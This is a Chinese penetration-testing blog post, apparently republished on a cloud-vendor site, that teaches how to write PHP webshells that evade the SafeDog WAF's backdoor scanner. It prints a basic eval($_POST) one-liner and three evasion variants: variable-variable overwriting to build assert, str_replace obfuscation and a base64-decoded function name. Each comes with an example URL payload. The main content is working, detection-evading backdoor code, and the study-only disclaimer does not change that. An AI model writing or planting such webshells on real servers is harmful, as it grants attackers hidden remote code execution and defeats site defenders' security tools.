简单手写后门Safedog检测绕过

本文涉及的产品
Web应用防火墙 3.0,每月20元额度 3个月
简介: 简单手写后门Safedog检测绕过

简单手写后门Safedog检测绕过今天继续给大家介绍渗透测试相关知识,本文主要内容是简单手写后门Safedog检测绕过。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、Safedog后门扫描原理
SafeDog等WAF软件通常具有网络木马扫描功能,如下所示:

如果我们在网站中存在一个文件,是PHP一句话木马,如下所示:

<?php
eval($_POST['a']);
?>
1
2
3
那么当SafeDog进行扫描时,就会扫描出该文件,如下所示:

二、Safedog后门扫描绕过
上述后门之所以被Safedog拦截,是因为SafeDog检测到了eval函数和上传命令结合在了一起,因此,我们需要想办法避免这种写法,同时还能实现后门的功能。
我们可以采用变量覆盖的方式来写后门,后门PHP代码如下所示:

<?php
$a=$_GET['x'];
$$a=$_GET['y'];
$b($_GET['z']);
?>
1
2
3
4
5
在上述代码中,并没有直接出现assert函数,因此,安全狗扫描也不会查杀,如下所示:

但是,我们可以采取如下payload:

http://127.0.0.1/test.php?x=b&y=assert&z=phpinfo();
1
上述payload执行结果如下所示:

如果使用菜刀等工具连接,z就是webshell的密码。分析上述URL,可以看出,在传入上述参数后,各个变量结果如下:

\$a=b
\$\$a=assert
1
2
因此$b=assert。因此上述代码变为:

assert(\$_GET['z'])
1
因此成为了一个webshell。
除了上述方式外,还有一些绕过WAF的思路,例如:
1、字符替换
字符替换是通过字符的替换,来代理敏感字符串,以绕过WAF的检测,相关PHP代码如下所示:

<?php
$a=str_replace('123','','as123ser123t');
$a($_GET['x']);
?>
1
2
3
4
对该代码的payload为:

http://127.0.0.1/test.php?x=phpinfo();
1
2、字符编码
字符编码的方式是将敏感字符串进行字符编码后,然后再利用代码进行解码,然后就可以绕过WAF的检测了。相关PHP代码如下所示:

<?php
$a=base64_decode("YXNzZXJ0");
$a($_GET['x']);
?>
1
2
3
4
对该代码的payload为:

http://127.0.0.1/test.php?x=phpinfo();
1
以上几种方式,获取不能直接绕过WAF的检测,但是我们可以借鉴这些写法的思想,形成更加复杂的webshell。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200
————————————————

                        版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文链接:https://blog.csdn.net/weixin_40228200/article/details/128689303

目录
相关文章
|
3月前
|
网络协议 安全 网络安全
ssrf检测防御与绕过
ssrf检测防御与绕过
|
8月前
|
安全 应用服务中间件 PHP
文件上传解析漏洞,以及检测方式的绕过
文件上传解析漏洞,以及检测方式的绕过
|
8月前
|
SQL
14、sql注入绕过技术
14、sql注入绕过技术
57 0
|
SQL XML 安全
半小时了解SQL注入漏洞?(注入方式大全+绕过大全)
🏆今日学习目标: 🍀学习了解sql注入漏洞
402 0
|
SQL 存储 安全
网站如何防止sql注入攻击的解决办法
首先我们来了解下什么是SQL注入,SQL注入简单来讲就是将一些非法参数插入到网站数据库中去,执行一些sql命令,比如查询数据库的账号密码,数据库的版本,数据库服务器的IP等等的一些操作,sql注入是目前网站漏洞中危害最大的一个漏洞,受攻击的网站占大多数都是sql注入攻击。
451 0
网站如何防止sql注入攻击的解决办法
|
XML 安全 网络安全
网站安全渗透测试 文件包含注入检测办法
昨天给大家普及到了渗透测试中执行命令漏洞的检测方法,今天抽出时间由我们Sine安全的渗透工程师来讲下遇到文件包含漏洞以及模板注入漏洞的检测方法和防御手段,本文仅参考给有授权渗透测试的正规安全检测的客户,让更多的客户了解到具体测试的内容,是如何进行全面的网站安全测试。
1592 0
|
SQL 安全 前端开发
网站漏洞测试 sql注入攻击代码的审计与检测
wordpress系统本身代码,很少出现sql注入漏洞,反倒是第三方的插件出现太多太多的漏洞,我们SINE安全发现,仅仅2019年9月份就出现8个插件漏洞,因为第三方开发的插件,技术都参差不齐,对安全方面也不是太懂导致写代码过程中没有对sql注入,以及xss跨站进行前端安全过滤,才导致发生sql注入漏洞。
1832 0
|
PHP Serverless
各种绕过
各种绕过 110 各种绕过哟http://120.24.86.145:8002/web7/ get 接收 id 和 uname post 接收 passwd sha1() 函数计算字符串的 SHA-1 散列 根据函数性质,嗯,又是构造数组就好...
1036 0